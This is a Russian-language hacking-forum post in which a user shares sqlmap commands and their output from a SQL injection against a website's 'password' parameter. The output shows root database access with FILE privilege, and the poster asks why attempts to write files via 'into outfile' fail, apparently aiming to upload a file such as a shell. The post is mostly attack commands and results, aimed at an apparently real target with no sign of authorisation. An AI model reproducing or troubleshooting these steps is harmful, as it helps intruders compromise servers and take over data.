13.07.2021, 00:34
|
|
Познающий
Регистрация: 30.10.2009
Сообщений: 41
Провел на форуме:
592140
Репутация:
6
|
|
Сообщение от Baskin-Robbins
↑
В вашем случае можно попробовать залить файл в другие директории, либо поискать другой вектор.
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --privileges -U CU
Код:
[23:12:06] [INFO] fetching current user
[23:12:07] [INFO] retrieved: 'root@localhost'
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
@@secure_file_priv
Код:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
[23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
[23:18:45] [INFO] resumed: ' '
select @@secure_file_priv: ' '
--technique=E
Код:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E
[23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
--technique=B
Код:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B
[23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
С правами все нормально, не могу понять только почему не выполняется into outfile
|
|
|